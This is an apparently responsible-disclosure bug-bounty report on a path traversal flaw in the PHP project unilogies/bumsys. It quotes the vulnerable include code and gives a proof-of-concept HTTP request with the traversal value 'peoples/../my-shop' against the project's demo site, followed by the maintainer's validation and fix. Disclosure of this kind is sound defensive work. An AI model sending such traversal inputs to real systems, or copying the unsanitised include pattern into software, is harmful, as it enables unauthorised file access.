Path Traversal in code in unilogies/bumsys

Valid

Reported on

Mar 8th 2023

Description

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.

Proof of Concept

Code that has the vulnerability:

if(isset($_GET['module'])) {
    
    // Biuld the page location
    $ajaxModulePage = DIR_MODULE . $_GET['module'] . "/ajax.php";

    // Check if the ajax page is exists
    if(file_exists($ajaxModulePage)) {
         // Load the ajax module page
        require $ajaxModulePage;

        // If need iCheck then include it.
        if(isset($_GET["icheck"]) and $_GET["icheck"] === "true") {
            echo "<script> $('input[type=\"checkbox\"].square').iCheck({ checkboxClass: 'icheckbox_square-blue', }) </script>";
        }
        
        // If need tooltip then include it.
        if(isset($_GET["tooltip"]) and $_GET["tooltip"] === "true") {
            echo "<script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script>";
        }
        
        // If need select2 then include it.
        if(isset($_GET["select2"]) and $_GET["select2"] === "true") {
            echo "<script> $(document).ready(function() { $('.select2').select2(); }); </script>";
        }

    } else {

        echo "<div class='alert alert-danger'>Invalid module url. Please check the form action.</div>";

    }

}

Request:

POST /xhr/?module=peoples/../my-shop&page=posSaleList HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; __9f5aaf9a1c723f88a93114980386cd57d852e02a=tuuv72f7ij41fn128ha9u1vjs4; currencySymbol=%E0%A7%B3; keepAlive=1; __2a394d7098ce5a777abe5dc58243b7f5e3fca7ac=tvakqcbhioa0cuotreneas9ad0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrf-Token: 36e268f96394f73e89350d434bf6e1123ea3b07f
X-Requested-With: XMLHttpRequest
Content-Length: 0
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/peoples/user-list/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

Through this vulnerability, it is possible to change the path.

module=peoples

Full Path:

/home/alamdev/bumsys/module/peoples/ajax.php

Should open page "peoples", but if we type

peoples/../my-shop

Edited Path:

/home/alamdev/bumsys/module/peoples/../my-shop/ajax.php

Result path:

/home/alamdev/bumsys/module/my-shop/ajax.php

It will go up one directory and open "my-shop".

Impact

This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.

Occurrences

$ajaxModulePage = DIR_MODULE . $_GET['module'] . "/ajax.php";
We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 3 months ago
hatlesswizard
2 months ago

Researcher

Any update from you guys

Khurshid Alam validated this vulnerability a month ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
hatlesswizard
a month ago

Researcher

Could you give CVE please?

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
index.php#L17 has been validated
to join this conversation